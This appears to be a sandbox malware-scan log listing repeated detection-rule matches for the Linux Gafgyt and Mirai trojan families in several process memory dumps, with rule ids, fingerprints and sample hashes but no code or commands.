Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6226.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6238.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6228.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_862c4e0e reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281, id = 862c4e0e-83a4-458b-8c00-f2f3cf0bf9db, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_32eb0c81 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 7c50ed29e2dd75a6a85afc43f8452794cb787ecd2061f4bf415d7038c14c523f, id = 32eb0c81-25af-4670-ab77-07ea7ce1874a, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_3fe3c668 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec, id = 3fe3c668-89f4-4601-a167-f41bbd984ae5, last_modified = 2021-09-16
Source: 6232.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Mirai_637f2c04 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 7af3d573af8b7f8252590a53adda52ecf53bdaf9a86b52ef50702f048e08ba8c, id = 637f2c04-98e4-45aa-b60a-14a96c6cebb7, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a6a2adb9 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = cdd0bb9ce40a000bb86b0c76616fe71fb7dbb87a044ddd778b7a07fdf804b877, id = a6a2adb9-9d54-42d4-abed-5b30d8062e97, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_f3d83a74 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 1c5df68501b688905484ed47dc588306828aa7c114644428e22e5021bb39bd4a, id = f3d83a74-2888-435a-9a3c-b7de25084e9a, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_e0673a90 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 6834f65d54bbfb926f986fe2dd72cd30bf9804ed65fcc71c2c848e72350f386a, id = e0673a90-165e-4347-a965-e8d14fdf684b, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_31796a40 reference_sample = 227c7f13f7bdadf6a14cc85e8d2106b9d69ab80abe6fc0056af5edef3621d4fb, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 0a6c56eeed58a1a100c9b981157bb864904ffddb3a0c4cb61ec4cc0d770d68ae, id = 31796a40-1cbe-4d0c-a785-d16f40765f4a, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_a0a4de11 reference_sample = cf1ca1d824c8687e87a5b0275a0e39fa101442b4bbf470859ddda9982f9b3417, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 891cfc6a4c38fb257ada29050e0047bd1301e8f0a6a1a919685b1fcc2960b047, id = a0a4de11-fe65-449f-a990-ad5f18ac66f0, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_09c3070e reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 84fad96b60b297736c149e14de12671ff778bff427ab7684df2c541a6f6d7e7d, id = 09c3070e-4b71-45a0-aa62-0cc6e496644a, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_46eec778 reference_sample = 9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 2602371a40171870b1cf024f262e95a2853de53de39c3a6cd3de811e81dd3518, id = 46eec778-7342-4ef7-adac-35bc0cdb9867, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_656bf077 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ea8ed60190198d5887bb7093975d648a9fd78234827d648a8258008c965b1c1, id = 656bf077-ca0c-4d28-9daa-eb6baafaf467, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_dd0d6173 reference_sample = c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f, id = dd0d6173-b863-45cf-9348-3375a4e624cf, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_779e142f reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f, id = 779e142f-b867-46e6-b1fb-9105976f42fd, last_modified = 2021-09-16
Source: 6237.1.0000000000400000.000000000042b000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_cf84c9f2 reference_sample = 275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc, id = cf84c9f2-7435-4faf-8c5f-d14945ffad7a, last_modified = 2021-09-16
